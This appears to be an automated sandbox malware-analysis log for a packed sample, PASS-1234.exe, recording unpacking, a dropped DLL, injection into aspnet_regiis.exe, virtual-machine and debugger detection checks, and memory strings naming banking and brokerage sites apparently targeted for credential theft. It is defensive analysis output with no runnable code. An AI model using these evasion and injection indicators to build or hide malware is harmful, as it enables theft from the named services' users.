Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PASS-1234.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PASS-1234.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdba source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: %%.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: HP^o0C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb Cultu source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb5t source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbN source: PASS-1234.exe, 00000000.00000002.2208701388.00000000013FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERECA6.tmp.dmp.6.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbxi source: PASS-1234.exe, 00000000.00000002.2208701388.0000000001381000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\PASS-1234.PDB source: PASS-1234.exe, 00000000.00000002.2208350203.0000000000DEA000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\PASS-1234.exe

Unpacked PE file: 0.2.PASS-1234.exe.b90000.0.unpack C;FTo:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: PASS-1234.exe	Static PE information: section name: C;FTo
Source: PASS-1234.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B990AC push edi; retf	0_2_00B990B7
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9608B push edi; retf	0_2_00B960EF
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B960D8 push edi; retf	0_2_00B960EF
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B971BA push esp; retf	0_2_00B971D6
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BA1185 push E06F2BF3h; retf	0_2_00BA11A9
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9C9D0 pushfd ; retf	0_2_00B9C9CF
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B961C1 push edx; retf	0_2_00B961EC
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9617E push edx; retf	0_2_00B961EC
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9C971 pushfd ; retf	0_2_00B9C9CF
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B96142 push edi; retf	0_2_00B960EF
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9221F push ecx; iretd	0_2_00B92220
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B9820A push edi; retf	0_2_00B98254
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BA1A7B push edx; retf	0_2_00BA1A85
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B96260 push edx; retf	0_2_00B961EC
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B94A5E push edx; retf	0_2_00B94A97
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BEFD60 push eax; mov dword ptr [esp], A8ABAAFDh	0_2_00BEFD62
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B96EA9 push ds; retf	0_2_00B96EBF
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00BA06AD push ds; retf	0_2_00BA06EB
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_00B937ED push esp; retf	0_2_00B937F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AC170 push eax; mov dword ptr [esp], 05020300h	3_2_031AC17E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 3_2_031AEE60 push eax; mov dword ptr [esp], A8ABAAFDh	3_2_031AEE62

Source: PASS-1234.exe

Static PE information: section name: C;FTo entropy: 7.999702756897987

Source: C:\Users\user\Desktop\PASS-1234.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PASS-1234.exe PID: 1916, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 4F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 5590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 6590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 66C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 76C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 7B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Memory allocated: 8B90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Window / User API: threadDelayed 3469

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 4396	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7084	Thread sleep count: 3469 > 30			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PASS-1234.exe

Code function: 0_2_6D393562 FindFirstFileExW,

0_2_6D393562

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389826403.0000000003425000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788081737.000000000341E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389909907.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783480439.0000000003422000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005908000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389909907.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU
Source: aspnet_regiis.exe, 00000003.00000003.2741161023.00000000058E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SE1sQemuD
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API call chain: ExitProcess graph end node

graph_3-13672

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PASS-1234.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\PASS-1234.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 3_2_031AD810 LdrInitializeThunk,

3_2_031AD810

Source: C:\Users\user\Desktop\PASS-1234.exe

Code function: 0_2_6D39051A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6D39051A

Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D391CA5 mov eax, dword ptr fs:[00000030h]		0_2_6D391CA5
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D392E79 mov eax, dword ptr fs:[00000030h]		0_2_6D392E79

Source: C:\Users\user\Desktop\PASS-1234.exe

Code function: 0_2_6D394A8C GetProcessHeap,

0_2_6D394A8C

Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D39051A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D39051A
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D392EAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D392EAA
Source: C:\Users\user\Desktop\PASS-1234.exe	Code function: 0_2_6D390041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D390041

Source: C:\Users\user\Desktop\PASS-1234.exe

